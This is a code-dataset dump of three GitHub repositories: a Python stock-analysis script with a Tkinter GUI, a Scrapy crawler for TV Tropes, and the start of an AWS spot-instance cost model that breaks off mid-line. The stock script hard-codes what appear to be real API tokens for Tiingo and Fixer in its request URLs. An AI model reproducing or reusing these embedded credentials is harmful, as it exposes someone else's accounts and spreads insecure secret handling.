"alphanum_fraction": 0.6253942251205444, "avg_line_length": 34.875911712646484, "blob_id": "ad86131918d4ef958eb0d4f3ec834d85f2979bf8", "content_id": "151c91984444bbbadd8df4e5196c9ab4cca5cd40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9829, "license_type": "no_license", "max_line_length": 142, "num_lines": 274, "path": "/stocks_analysis.py", "repo_name": "manikpurivibhu/Stocks-Analysis", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams \nimport requests\nimport json\nfrom datetime import datetime\nimport re\nfrom IPython.display import display\n#import tkinter as tk\nfrom tkinter import *\n\n#Companies and their corresponding info\nstock_symbols = pd.read_csv('ticker_list.csv')\nstock_symbols.dropna(axis = 0)\nstock_symbols.set_index(stock_symbols['Name'], inplace = True)\n\n#function to fetch symbol on passing company name as parameter\ndef get_sym(comp_name):\n return stock_symbols.loc[comp_name]['Symbol']\n\n\n#Prompting user or symbol or company name to fetch symboltry:\ndef get_ticker() :\n try:\n global symbol\n symbol = str(input(\"Enter company Symbol or name : \"))\n if symbol in stock_symbols['Symbol'].values:\n pass\n else: \n sym = get_sym(symbol)\n if sym in stock_symbols['Symbol'].values:\n symbol = sym\n print(\"Symbol :\\t\", sym)\n \n except KeyError as e:\n print(\"\\n\\nPlease enter valid Company name or it's Ticker.\")\n get_ticker()\n\nget_ticker()\n\n\n#Prompting user for start and end dates\ndef get_dates():\n global start_date, end_date, cheat\n try:\n start_date = pd.Timestamp(input(\"\\nEnter start date for Stock analysis:\\t\"), tz = \"Asia/Kolkata\")\n if (pd.isnull(start_date) == True):\n print(\"\\nPlease enter a Start Date for Analysis :\")\n get_dates()\n end_date = pd.Timestamp(input(\"\\nEnter End Date for Stock analysis:\\t\"), tz = \"Asia/Kolkata\")\n cheat = 'input'\n if (pd.isnull(end_date) == True) :\n cheat = 'default'\n end_date = pd.to_datetime(\"today\")\n print(end_date.date())\n if (start_date > end_date) : \n print(\"\\n\\nStart Date can not be later than End 
Date\")\n get_dates()\n except ValueError as e:\n print(\"\\nPlease enter valid date (yyyy-mm-dd)\")\n get_dates()\n except TypeError as t:\n print(\"\\nPlease enter value(s).\\n\\nNvm if valid dates already entered\")\n \nget_dates()\n\n\n#url for fetching stock data for given symbol and start date\nurl = \"https://api.tiingo.com/tiingo/daily/\" + symbol + \"/prices?startDate=\" + str(start_date)[:10] + \"&token=087e4fc0c07b596eec220c6f75fab6680dcda7d8\"\n#print(url)\n\n#gets stock info in json format for symbol from start date\nheaders = {\n 'Content-Type': 'application/json'\n}\nrequestResponse = requests.get(url, headers = headers) \njson_stock_obj = requestResponse.json()\n\n#creating jsonfile from json oject so that it can be loaded to a dataframe\njson_file = open(\"json_file.json\", \"w+\") \njson.dump(json_stock_obj, json_file, indent = 6) \njson_file.close() \n\n#loading fetched stock data to pandas dataframe\nstock_data = pd.read_json('json_file.json')\n\ntry: \n if(cheat=='default'):\n stocks = stock_data.set_index(keys = stock_data['date']).loc[start_date:]\n else:\n stocks = stock_data.set_index(keys = stock_data['date']).loc[start_date:end_date]\nexcept ValueError as V:\n print(\"Please enter Valid dates\")\n\n\n#get currency conversion rates from 'fixer' api\ncurrency = requests.get('http://data.fixer.io/api/latest?access_key=87af610b8afee0f3be1a812640ebd6ff').json()\ncur = currency['rates']\n\n#currency conversion USD -> INR\ndef curconv(val):\n return round(((val / cur['USD']) * cur['INR']), 2)\nstocks = stocks.apply((lambda x: curconv(x) if x.name in ['close', 'open', 'high', 'low', 'adjClose', 'adjOpen', 'adjHigh', 'adjLow'] else x))\n\n\n#ANALYSIS\n\nanalysis = stocks.describe()\nanalysis = analysis.loc[['count', 'mean', 'std', 'min', 'max']].drop(['divCash','splitFactor'], axis = 1)\nanalysis.rename(columns={\"close\": \"Close\", \"high\": \"High\", \"low\": \"Low\",\n \"open\": \"Open\", \"volume\": \"Volume\", \"adjClose\": \"Adjacent Close\",\n \"adjHigh\": \"Adjacent High\", \"adjLow\": \"Adjacent Low\",\n \"adjOpen\": \"Adjacent Open\"}, errors=\"raise\",inplace = True)\nprint(\"\\n\\nStastical Analysis of \" + symbol + \"'s Historical Stock data : \\n\\n\")\ndisplay(analysis)\n\n\n#Simple Moving Average\nstocks['SMAshort'] = stocks['close'].rolling(window = 20).mean()\nstocks['SMAextended'] = stocks['close'].rolling(window = 100).mean()\nwindows = stocks['close'].rolling(10)\nmoving_averages = windows.mean()\n\n#Bollinger Bands\nstocks['middle_band'] = stocks['close'].rolling(window = 20).mean()\nstocks['upper_band'] = stocks['close'].rolling(window = 20).mean() + stocks['close'].rolling(window = 20).std()*2\nstocks['lower_band'] = stocks['close'].rolling(window = 20).mean() - stocks['close'].rolling(window = 20).std()*2\n\n#VISUALIZATION\n\n##Plotting function\ndef plot_data(xlen, ylen, label1, label2, title1, is_sub = False, label3 = None, label4 = None, title2 = None):\n \n dict = {\"Open\" : \"open\", \"Close\" : \"close\", \"High\" : \"high\", \"Low\" : \"low\", \"Volume\" : \"volume\",\n \"Adjacent Open\": \"adjOpen\", \"Adjacent Close\": \"adjClose\", \"Adjacent High\": \"adjHigh\",\n \"Adjacent Low\" : \"adjLow\", \"Adjacent Volume\" : \"adjVolume\", \n \"Simple Moving Average (20 days)\" : \"SMAshort\", \"Simple Moving Average (100 days)\" : \"SMAextended\",\n \"Upper Bollinger Band\" : \"upper_band\", \"Lower Bollinger Band\" : \"lower_band\", \n \"Middle Bollinger Band\" : \"middle_band\"}\n \n rcParams['figure.figsize'] = xlen, ylen\n sub = is_sub\n 
if sub is True:\n fig, (s1, s2) = plt.subplots(1,2)\n s1.grid(True, color = 'k', linestyle = ':')\n s2.grid(True, color = 'k', linestyle = ':')\n s1.plot(stocks[dict[label1]],color = 'g', label = label1)\n s1.plot(stocks[dict[label2]],color = 'b', label = label2)\n s1.set_title(title1)\n s1.legend(loc=\"upper left\", bbox_to_anchor=[0,1],\n ncol=1, shadow=True) \n\n s2.plot(stocks[dict[label3]],color = 'g', label = 'Open')\n s2.plot(stocks[dict[label4]],color = 'b', label = 'Close')\n s2.set_title(title2)\n s2.legend(loc=\"upper left\", bbox_to_anchor=[0,1],\n ncol=1, shadow=True)\n \n else:\n plt.plot(stocks[dict[label1]], color = 'g', label = label1)\n plt.plot(stocks[dict[label2]], color = 'b', label = label2)\n #plt.plot(stocks[dict[label3]], color = 'k', label = label3)\n #plt.plot(stocks[dict[label4]], color = 'r', label = label4) \n plt.legend()\n plt.grid(True, color = 'k', linestyle = ':')\n plt.title(title1)\n \n \n \n plt.xlabel(\"Date\")\n plt.ylabel(\"Price(INR)\")\n\n plt.style.use('seaborn-darkgrid')\n plt.show()\n\n\n##Advanced Plotting Graph\n\ndef plot_analysis(xlen, ylen, label1, label2, title, label3 = None, label4 = None):\n \n dict = {\"Close\" : \"close\", \"Simple Moving Average (20 days)\" : \"SMAshort\", \"Simple Moving Average (100 days)\" : \"SMAextended\",\n \"Upper Bollinger Band\" : \"upper_band\", \"Lower Bollinger Band\" : \"lower_band\", \n \"Middle Bollinger Band\" : \"middle_band\"}\n \n rcParams['figure.figsize'] = xlen, ylen\n \n \n plt.plot(stocks[dict[label1]], color = 'g', label = label1)\n plt.plot(stocks[dict[label2]], color = 'b', label = label2)\n plt.plot(stocks[dict[label3]], color = 'k', label = label3)\n if label4 is not None:\n plt.plot(stocks[dict[label4]], color = 'r', label = label4) \n plt.legend()\n plt.grid(True, color = 'k', linestyle = ':')\n plt.title(title)\n plt.show()\n\n\n#Open/Close - Adjacent Open/Adjacent Close\ndef openclose():\n plot_data(xlen = 15, ylen = 4, label1 = \"Open\", label2 = \"Close\", title1 = \"Open/Close\", is_sub = True,\n label3 = \"Adjacent Open\",label4 = \"Adjacent Close\", title2 = \"Adjacent Open/ Adjacent Close\")\n\n#High/Low - ADjacent High/Adjacent Low\ndef highlow():\n plot_data(xlen = 16, ylen = 4, label1 = \"High\", label2 = \"Low\", title1 = \"High/Low\", is_sub = True,\n label3 = \"Adjacent High\",label4 = \"Adjacent Low\", title2 = \"Adjacent High/ Adjacent Low\") \n\n#Volume/Adjacent Volume\ndef vol():\n plot_data(xlen = 13.5, ylen = 6, label1 = \"Volume\", label2 = \"Adjacent Volume\", title1 = \"Volume/Adjacent Volume\")\n\n#SMA\ndef sma():\n plot_analysis(xlen = 14, ylen = 8, label1 = \"Close\", label2 = \"Simple Moving Average (20 days)\", \n label3 = \"Simple Moving Average (100 days)\", title = \"Simple Moving Average\")\n\n#Bollinger Bands\ndef bands():\n plot_analysis(xlen = 12, ylen = 6, label1 = \"Close\", label2 = \"Upper Bollinger Band\", \n label3 = \"Middle Bollinger Band\", label4 = \"Lower Bollinger Band\", title = \"Bollinger Bands\")\n\n\n\n#GUI for handling multiple plots\n\nroot = Tk()\nroot.title('Stocks Analysis')\nroot.geometry('3500x2800')\n\nvar = IntVar()\nvar.set(\"1\")\n\nmainframe = Frame(root)\nmainframe.pack()\n\nimgframe = Frame(root)\nimgframe.place(x=0,y=0,relheight=1,relwidth=1)\n\nimg = PhotoImage(file = \"bgimage.png\")\nlabel = Label(imgframe, image = img)\nlabel.place(x=0, y=0, relheight=1, relwidth=1)\n\ndef q():\n root.quit()\n root.destroy()\n\nmainframe = Label(root)\nmainframe.pack()\n\nR1 = Radiobutton(mainframe, text=\"Open/Close\", 
variable=var, value=1,\n command=lambda:openclose()).pack()\nR2 = Radiobutton(mainframe, text=\"High/Low\", variable=var, value=2,\n command=lambda:highlow()).pack()\nR3 = Radiobutton(mainframe, text=\"Volume\", variable=var, value=3,\n command=lambda:vol()).pack()\nR4 = Radiobutton(mainframe, text=\"Simple Moving Average\", variable=var, value=4,\n command=lambda:sma()).pack()\nR5 = Radiobutton(mainframe, text=\"Bollinger Bands\", variable=var, value=5,\n command=lambda:bands()).pack()\n\n\nfinal = Text(mainframe)\nfinal.insert(END, str(analysis.iloc[:]))\nfinal.pack()\n\n\nquitbutton = Button(mainframe, text = \"QUIT\", command = q)\nquitbutton.pack()\n\nroot.mainloop()\n\nroot.destroy()" } ]
2
jmanuelrey/riws-crawler
https://github.com/jmanuelrey/riws-crawler
5ac5c166a667cd683d88ced4ce4bf49d3399752d
f325e95ed30754544f9579a64721d8081be6820b
44d1679795a3e98eba53e6f79298f4077f8a5ec9
refs/heads/master
2020-08-14T00:35:40.588386
2019-11-21T18:46:48
2019-11-21T18:46:48
215,064,779
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8048780560493469, "alphanum_fraction": 0.8048780560493469, "avg_line_length": 19.5, "blob_id": "d28136830bbd574da0140876f6cc11a7d5c8c88a", "content_id": "0153b0fbb0bd5364344a7f66bb74dcbe6e354550", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "permissive", "max_line_length": 25, "num_lines": 2, "path": "/README.md", "repo_name": "jmanuelrey/riws-crawler", "src_encoding": "UTF-8", "text": "# riws-crawler\nCrawler built with scrapy\n" }, { "alpha_fraction": 0.8133333325386047, "alphanum_fraction": 0.8133333325386047, "avg_line_length": 37, "blob_id": "57ed00ba62d2715b9983f0b31d557a64fb6cabeb", "content_id": "71dc3daa92a91dd235b45d8f6a370b30f5747a1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 75, "license_type": "permissive", "max_line_length": 48, "num_lines": 2, "path": "/crawler/spiders/main.py", "repo_name": "jmanuelrey/riws-crawler", "src_encoding": "UTF-8", "text": "from scrapy import cmdline\ncmdline.execute(\"scrapy crawl tvtropes\".split())" }, { "alpha_fraction": 0.6738373041152954, "alphanum_fraction": 0.6777299642562866, "avg_line_length": 30.09554100036621, "blob_id": "fc8ba17cb86e50c628f47042b01fd5ee35fc815a", "content_id": "49cb11883d07c9f32f19bc592f8eed8b37140a7a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4881, "license_type": "permissive", "max_line_length": 314, "num_lines": 157, "path": "/crawler/spiders/tvtropes_spider.py", "repo_name": "jmanuelrey/riws-crawler", "src_encoding": "UTF-8", "text": "from goose3 import Goose\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.exceptions import CloseSpider\n\nimport re, os, json\n\nclass TvTropesSpider(CrawlSpider):\n\t# Nombre del crawler\n\tname = 'tvtropes'\n\t# Dominios permitidos\n\tallowed_domains = ['tvtropes.org']\n\t# URLs iniciales\n\tstart_urls = ['https://tvtropes.org/pmwiki/pagelist_having_pagetype_in_namespace.php?n=Main&t=trope&page=1']\n\t\n\t# Lista de medios\n\tmedia_list = ['Film', 'Series', 'Anime', 'Manga', 'VisualNovel', 'LightNovel', 'WesternAnimation', 'Disney', 'Animation', 'Toys', 'Literature', 'ComicBook', 'VideoGame', 'Website', 'Creator', 'Franchise', 'TabletopGame', 'Webcomic', 'Radio', 'Manhua', 'Manhwa', 'Music', 'Theatre', 'Myth', 'Ride'] # TODO rellenar\n\t\n\t# Reglas de crawling\n\trules = (\n\t\t# Extraer enlaces de 'Main' y 'Laconic'\n\t\tRule(\n\t\t\tLinkExtractor(\n\t\t\t\tallow=('pmwiki.php/Laconic')),\n\t\t\tcallback='parse_item',\n\t\t\tfollow=False),\n\t\tRule(\n\t\t\tLinkExtractor(\n\t\t\t\tallow=('pmwiki.php/Main')),\n\t\t\tcallback='parse_item',\n\t\t\tfollow=True),\n\t)\n\t\n\t# Contadores\n\titer_count = 0\n\ttrope_count = 0\n\tlaconic_count = 0\n\tnon_trope_count = 0\n\t\n\t# Crawlear MAX_COUNT paginas\n\t# Nota: no se crawlean *exactamente* MAX_COUNT paginas\n\tMAX_COUNT = 10000\n\tcustom_settings = {\n\t\t\t'CLOSESPIDER_PAGECOUNT': MAX_COUNT\n\t}\n\t\n\t# Obtener directorio actual\n\tcurrent_directory = os.getcwd()\n\t# Obtener carpeta 'data' dentro del directorio\n\tfinal_directory = os.path.join(current_directory, 'data/')\n\tos.mkdir(final_directory)\n\t\n\t# Crear archivos asociados a un tropo, en formato json\n\tdef create_files(self, json_file, file_name):\n\t\n\t\t# El nombre de la carpeta contenedora es de la forma 'titulo'-tropo o 'titulo'-laconic, \n\t\t# con 
los espacios del titulo sustituidos por guiones\n\t\tfile_dir = '{}-{}'.format(json_file['title'],file_name)\n\t\tfile_dir = file_dir.replace(\" \",\"-\")\n\t\t# Crear jerarquia de carpetas\n\t\t# Para cada elemento, se crea una carpeta 'data/tropo' y otra 'data/laconic' (si tiene)\n\t\t# La carpeta 'data' solo se crea la primera vez\n\t\tif not os.path.exists(os.path.join(self.final_directory, file_dir + '/')):\n\t\t\tos.makedirs(self.final_directory + file_dir + '/')\n\n\t\twith open(self.final_directory + file_dir + '/' + file_name + '.json', 'w+', encoding='utf-8') as fp:\n\t\t\tjson.dump(json_file, fp)\n\t\n\t# Generar objeto json con los datos del elemento\n\tdef generate_json(self, article):\n\t\n\t\ttitle = article.title\n\t\ttitle = title.replace(' / Laconic', '') ###\n\t\ttitle = title.replace('/', '-') ###\n\t\t\n\t\tcontent = article.cleaned_text\n\t\tlinks = article.links\n\t\tcurrent_url = article.canonical_link\n\t\t\n\t\tmedia_links = []\n\t\tnon_media_links = []\n\t\t\n\t\t# Para cada enlace extraido por goose\n\t\tfor(i, link) in enumerate(links):\n\t\t\tadded = False\n\t\t\t# Para cada medio posible\n\t\t\tfor media in self.media_list:\n\t\t\t# Si el enlace contiene uno de los medios, lo almacenamos en su lista\n\t\t\t\trx = \"pmwiki/pmwiki.php/(\"+media+\")/\"\n\t\t\t\t\n\t\t\t\tif(re.search(rx, link)):\n\t\t\t\t\tmedia_links.append(link)\n\t\t\t\t\tadded = True\n\t\t\t\t\tbreak\n\t\t\tif(not added):\n\t\t\t\t# Si el enlace no contiene ningun medio, lo almacenamos en otra\n\t\t\t\tnon_media_links.append(link)\n\t\t\n\t\tjson_file = {\n\t\t\t\"title\": title,\n\t\t\t\"content\": content,\n\t\t\t\"url\": current_url,\n\t\t\t\"media_links\": media_links,\n\t\t\t\"non_media_links\": non_media_links,\n\t\t}\n\t\t\n\t\treturn json_file\n\t\n\t# Parsear elemento\n\tdef parse_item(self, response):\n\t\n\t\tself.iter_count += 1\n\t\t\n\t\thtml = response.body\n\t\t\n\t\t# Objeto Goose para extraer datos de la pagina\n\t\tgoose_extractor = Goose()\n\t\tarticle = goose_extractor.extract(raw_html=html)\n\t\t\n\t\t# Comprobar que la pagina contenga (por lo menos) un header h2 con la palabra 'Examples', para saber si es un tropo o no\n\t\tif(response.css('h2').re('.Examples:.')):\n\t\t\tself.trope_count+=1\n\t\t\tfollow = True\n\t\t\tjson_file = self.generate_json(article)\n\t\t\tself.create_files(json_file, 'tropo')\n\t\t\t\n\t\t\t# Archivo para comprobar los tropos indexados\n\t\t\t#with open(self.final_directory + 'trope_list.txt', 'a+', encoding='utf-8') as fp:\n\t\t\t#\tfp.write(response.url+'\\n')\n\t\t\t\n\t\telse:\n\t\t\tself.non_trope_count += 1\n\t\t\tif('Laconic' in response.url):\n\t\t\t\tprint('Encontrado un Laconic!')\n\t\t\t\tself.laconic_count += 1\n\t\t\t\tjson_file = self.generate_json(article)\n\t\t\t\tself.create_files(json_file, 'laconic')\n\t\t\telse:\n\t\t\t\tprint('Enlace ignorado! (no era un tropo)')\n\t\t\tfollow = False\n\t\t\n\t\t# Cerrar objeto goose\n\t\tgoose_extractor.close()\n\t\t\n\n\t# Closed se llama cuando el spider termina de crawlear\n\tdef closed(self, reason):\n\t\tself.logger.info('Closed spider: %s' % reason)\n\t\tself.logger.info('Total iterations: %s' % self.iter_count)\n\t\tself.logger.info('Trope count: %s' % self.trope_count)\n\t\tself.logger.info('Laconic count: %s' % self.laconic_count)\n\t\tself.logger.info('Non-trope count: %s' % self.non_trope_count)\n\n''' Excepciones notables al formato habitual de tropo (no tienen ejemplos -> no es un tropo?):\nAbsurdism\nAbsurdlyCoolCity\n'''" } ]
3
computational-neuroimaging-lab/Clark2015_AWS
https://github.com/computational-neuroimaging-lab/Clark2015_AWS
6bfdd132a01f1845d4d6ef790ef54b94e2af64df
8928dcd44ff8210aedea08eb1d91e29c18ce0f4d
c35e05ec6fe40ecc87555568a2849c7e703a7914
refs/heads/master
2016-09-06T08:25:50.262526
2016-03-02T20:14:01
2016-03-02T20:14:01
35,069,173
8
2
null
2015-05-05T01:00:07
2015-05-26T15:06:10
2015-06-01T17:48:27
Python
[ { "alpha_fraction": 0.5790097117424011, "alphanum_fraction": 0.5969005227088928, "avg_line_length": 37.12165832519531, "blob_id": "3e83e6192a8f4205288d348021067b111da0d872", "content_id": "2c1bf5273f13047791aae3d87667565cf7216e15", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41362, "license_type": "permissive", "max_line_length": 87, "num_lines": 1085, "path": "/spot-model/spot_price_model.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# spot_price_model.py\n#\n# Contributing authors: Daniel Clark, Cameron Craddock, 2015\n\n'''\nThis module contains functions which return the total duration, cost,\nexpected failure time, expected wait time, and probability of failure\nfor a job submission to an AWS EC2 SPOT cluster\n'''\n\n# Calculate costs with the EBS model\ndef calc_s3_model_costs(run_time, wait_time, node_cost, first_iter_time,\n num_jobs, num_nodes, jobs_per, av_zone,\n in_gb, out_gb, up_rate, down_rate):\n '''\n Function to take results from the simulate_market function and\n calculate total costs and runtimes with data transfer and storage\n included for the S3-based storage model\n\n Parameters\n ----------\n run_time : float\n the total number of seconds all of the nodes were up running\n wait_time : float\n the total number of seconds spent waiting for the spot price\n to come down below bid\n node_cost : float\n the per-node running, or instance, cost\n first_iter_time : float\n the number of seconds the first job iteration took to complete;\n this is used to model when outputs begin downloading from EC2\n num_jobs : integer\n total number of jobs to run to complete job submission\n num_nodes : integer\n the number of nodes that the cluster uses to run job submission\n jobs_per : integer\n the number of jobs to run per node\n av_zone : string\n the AWS EC2 availability zone (sub-region) to get spot history\n from\n in_gb : float\n the total amount of input data for a particular job (in GB)\n out_gb : float\n the total amount of output data from a particular job (in GB)\n up_rate : float\n the average upload rate to transfer data to EC2 (in Mb/s)\n\n Returns\n -------\n total_cost : float\n the total amount of dollars the job submission cost\n instance_cost : float\n cost for running the instances, includes master and all slave\n nodes\n storage_cost : float\n cost associated with data storage\n xfer_cost : float\n cost associated with data transfer (out only as in is free)\n total_time : float\n the total amount of seconds for the entire job submission to\n complete\n run_time : float\n returns the input parameter run_time for convenience\n wait_time : float\n returns the input parameter wait_time for convenience\n xfer_up_time : float\n the amount of time it took to transfer the input data up to\n the master node (seconds)\n xfer_down_time : float\n the amount of time it took to transfer all of the output data\n from the master node (seconds)\n '''\n\n # Import packages\n import numpy as np\n\n # Init variables\n cpac_ami_gb = 30\n secs_per_avg_month = (365/12.0)*24*3600\n num_iter = np.ceil(num_jobs/float((jobs_per*num_nodes)))\n # Upload speed from instance to S3 (mbps/8 bits/1000 MB in 1 GB)\n upl_to_s3_gbps = 100/8.0/1000.0\n\n # Get total execution time as sum of running and waiting times\n exec_time = run_time + wait_time\n\n ### Master runtime + storage time (EBS) + xfer time ###\n up_gb_per_sec = up_rate/8.0/1000.0\n xfer_up_time = 
num_jobs*(in_gb/up_gb_per_sec)\n\n # Get the number of jobs ran through n-1 iterations\n num_jobs_n1 = ((num_iter-1)*num_nodes*jobs_per)\n # Calculate how long it takes to transfer up all of the output data\n # *This is modeled as happening as the jobs finish during the full run\n # Sequential uploads at full bandwidth\n # (could be simultaneous uploads at 1/jobs_per bandwidth - same upl time)\n s3_upl_time_n1 = num_jobs_n1*(out_gb/upl_to_s3_gbps)\n exec_time_n1 = exec_time - first_iter_time\n residual_jobs = num_jobs - num_jobs_n1\n\n # End of upload of master node\n # 1) Transfer data up\n # 2) First iteration of running\n # 3) Rest of iteration runtimes, or all but last iteration's upload times..\n # ....whichever is greater\n # 4) Last iteration's (residual) upload times\n master_up_time = xfer_up_time + \\\n first_iter_time + \\\n np.max([exec_time_n1, s3_upl_time_n1]) + \\\n residual_jobs*(out_gb/upl_to_s3_gbps)\n\n # Get total transfer up time\n s3_upl_time = s3_upl_time_n1 + residual_jobs*(out_gb/upl_to_s3_gbps)\n\n ### Get EBS storage costs ###\n ebs_ssd = get_ec2_costs(av_zone, 'ssd')\n # EBS should only need to hold per-iteration jobs (rm complete as they go)\n ebs_nfs_gb = in_gb*num_jobs + num_nodes*jobs_per*out_gb\n # Get GB-months\n master_gb_months = (ebs_nfs_gb+cpac_ami_gb)*\\\n (3600.0*np.ceil(master_up_time/3600.0)/secs_per_avg_month)\n nodes_gb_months = num_nodes*cpac_ami_gb*\\\n (3600.0*np.ceil(run_time/3600.0)/secs_per_avg_month)\n ebs_storage_cost = ebs_ssd*(master_gb_months + nodes_gb_months)\n\n ### Get S3 storage/xfer/requests costs ###\n # Return pricing for each storage, transfer, and requests\n # Assuming out_gb stored on S3 for month, up to 1TB/month price\n # S3 storage\n stor_gb_month = get_s3_costs(av_zone, 'stor')\n down_gb_per_sec = down_rate/8.0/1000.0\n secs_to_download_s3 = (num_jobs*out_gb)/down_gb_per_sec\n s3_storage_cost = stor_gb_month*\\\n (secs_to_download_s3/secs_per_avg_month)*\\\n (num_jobs*out_gb)\n # S3 download requests\n # How many input/output files get generated per job\n # Assume ~2 for input\n in_ratio = 2\n # Assume ~50 for outupt\n out_ratio = 50\n req_prices = get_s3_costs(av_zone, 'req')\n s3_req_cost = req_prices['get']*((out_ratio*num_jobs)/10000.0)\n # S3 download transfer\n xfer_per_gb = get_s3_costs(av_zone, 'xfer')\n s3_xfer_cost = xfer_per_gb*(num_jobs*out_gb)\n\n # Sum of storage, transfer, and requests\n s3_cost = s3_storage_cost + s3_req_cost + s3_xfer_cost\n\n ### Get computation costs ###\n # Add in master node costs - asssumed to be on-demand, t2.small\n master_on_demand = get_ec2_costs(av_zone, 'master')\n master_cost = master_on_demand*np.ceil(master_up_time/3600.0)\n # Get cumulative cost for running N nodes per iteration\n nodes_cost = node_cost*num_nodes\n # Sum master and slave nodes for total computation cost\n instance_cost = master_cost + nodes_cost\n\n ### Data transfer in costs are free ###\n\n ### Total cost ###\n total_cost = instance_cost + ebs_storage_cost + s3_cost\n ### Total time ###\n total_time = master_up_time + secs_to_download_s3\n\n # Return data frame entries\n return total_cost, instance_cost, ebs_storage_cost, s3_cost, \\\n s3_storage_cost, s3_req_cost, s3_xfer_cost, \\\n total_time, run_time, wait_time, \\\n xfer_up_time, s3_upl_time, secs_to_download_s3\n\n\n# Calculate costs with the EBS model\ndef calc_ebs_model_costs(run_time, wait_time, node_cost, first_iter_time,\n num_jobs, num_nodes, jobs_per, av_zone,\n in_gb, out_gb, out_gb_dl, up_rate, down_rate):\n '''\n Function to take results 
from the simulate_market function and\n calculate total costs and runtimes with data transfer and storage\n included for the EBS/EC2 storage model\n\n Parameters\n ----------\n run_time : float\n the total number of seconds all of the nodes were up running\n wait_time : float\n the total number of seconds spent waiting for the spot price\n to come down below bid\n node_cost : float\n the per-node running, or instance, cost\n first_iter_time : float\n the number of seconds the first job iteration took to complete;\n this is used to model when outputs begin downloading from EC2\n num_jobs : integer\n total number of jobs to run to complete job submission\n num_nodes : integer\n the number of nodes that the cluster uses to run job submission\n jobs_per : integer\n the number of jobs to run per node\n av_zone : string\n the AWS EC2 availability zone (sub-region) to get spot history\n from\n in_gb : float\n the total amount of input data for a particular job (in GB)\n out_gb : float\n the total amount of output data from a particular job (in GB)\n out_gb_dl : float\n the total amount of output data to download from EC2 (in GB)\n up_rate : float\n the average upload rate to transfer data to EC2 (in Mb/s)\n down_rate : float\n the average download rate to transfer data from EC2 (in Mb/s)\n\n Returns\n -------\n total_cost : float\n the total amount of dollars the job submission cost\n instance_cost : float\n cost for running the instances, includes master and all slave\n nodes\n storage_cost : float\n cost associated with data storage\n xfer_cost : float\n cost associated with data transfer (out only as in is free)\n total_time : float\n the total amount of seconds for the entire job submission to\n complete\n run_time : float\n returns the input parameter run_time for convenience\n wait_time : float\n returns the input parameter wait_time for convenience\n xfer_up_time : float\n the amount of time it took to transfer the input data up to\n the master node (seconds)\n xfer_down_time : float\n the amount of time it took to transfer all of the output data\n from the master node (seconds)\n '''\n\n # Import packages\n import numpy as np\n\n # Init variables\n cpac_ami_gb = 30\n secs_per_avg_month = (365/12.0)*24*3600\n num_iter = np.ceil(num_jobs/float((jobs_per*num_nodes)))\n\n # Get total execution time as sum of running and waiting times\n exec_time = run_time + wait_time\n\n ### Master runtime + storage time (EBS) + xfer time ###\n up_gb_per_sec = up_rate/8.0/1000.0\n down_gb_per_sec = down_rate/8.0/1000.0\n xfer_up_time = num_jobs*(in_gb/up_gb_per_sec)\n\n # Get the number of jobs ran through n-1 iterations\n num_jobs_n1 = ((num_iter-1)*num_nodes*jobs_per)\n # Calculate how long it takes to transfer down all of the jobs\n # *This is modeled as happening as the jobs finish during the full run\n xfer_down_time_n1 = num_jobs_n1*(out_gb_dl/down_gb_per_sec)\n exec_time_n1 = exec_time - first_iter_time\n residual_jobs = num_jobs - num_jobs_n1\n\n # End of download of master node\n master_up_time = xfer_up_time + \\\n first_iter_time + \\\n np.max([exec_time_n1, xfer_down_time_n1]) + \\\n residual_jobs*(out_gb_dl/down_gb_per_sec)\n\n # Get total transfer down time\n xfer_down_time = xfer_down_time_n1 + residual_jobs*(out_gb_dl/down_gb_per_sec)\n\n ### Get EBS storage costs ###\n ebs_ssd = get_ec2_costs(av_zone, 'ssd')\n ebs_nfs_gb = num_jobs*(in_gb+out_gb)\n\n # Get GB-months\n master_gb_months = (ebs_nfs_gb+cpac_ami_gb)*\\\n (3600.0*np.ceil(master_up_time/3600.0)/secs_per_avg_month)\n nodes_gb_months 
= num_nodes*cpac_ami_gb*\\\n (3600.0*np.ceil(run_time/3600.0)/secs_per_avg_month)\n storage_cost = ebs_ssd*(master_gb_months + nodes_gb_months)\n\n ### Get computation costs ###\n # Add in master node costs - asssumed to be on-demand, t2.small\n master_on_demand = get_ec2_costs(av_zone, 'master')\n master_cost = master_on_demand*np.ceil(master_up_time/3600.0)\n # Get cumulative cost for running N nodes per iteration\n nodes_cost = node_cost*num_nodes\n # Sum master and slave nodes for total computation cost\n instance_cost = master_cost + nodes_cost\n\n ### Data transfer costs ###\n ec2_xfer_out = get_ec2_costs(av_zone, 'xfer')\n xfer_cost = ec2_xfer_out*(num_jobs*out_gb_dl)\n\n ### Total cost ###\n total_cost = instance_cost + storage_cost + xfer_cost\n ### Total time ###\n total_time = master_up_time\n\n # Return data frame entries\n return total_cost, instance_cost, storage_cost, xfer_cost, \\\n total_time, run_time, wait_time, \\\n xfer_up_time, xfer_down_time\n\n\n# Calculate cost over interval\ndef calculate_cost(start_time, uptime_seconds, interp_history,\n interrupted=False):\n '''\n Function to calculate the runtime spot cost associated with an\n instance's spot history\n\n Parameters\n ----------\n start_time : datetime.datetime object\n start time of the spot history to calculate from\n uptime_seconds : float\n the number of seconds that the instance was running for\n interp_history : pandas.Series object\n the interpolated (second-resolution) spot history series,\n where the index is a timestamp and the values are prices\n interrupted : boolean (optional), default=False\n indicator of whether the instance was interrupted before\n terminating or not\n\n Returns\n -------\n total_cost : float\n the total amount of $ that the instance cost\n '''\n\n # Import packages\n import numpy as np\n import pandas as pd\n import datetime\n\n # Init variables\n pay_periods = np.ceil(uptime_seconds/3600.0)\n end_time = start_time + datetime.timedelta(seconds=uptime_seconds)\n hour_seq = pd.date_range(start_time, periods=pay_periods, freq='H')\n hourly_series = interp_history[hour_seq]\n\n # Sum up all but last hour price if interrupted\n total_cost = 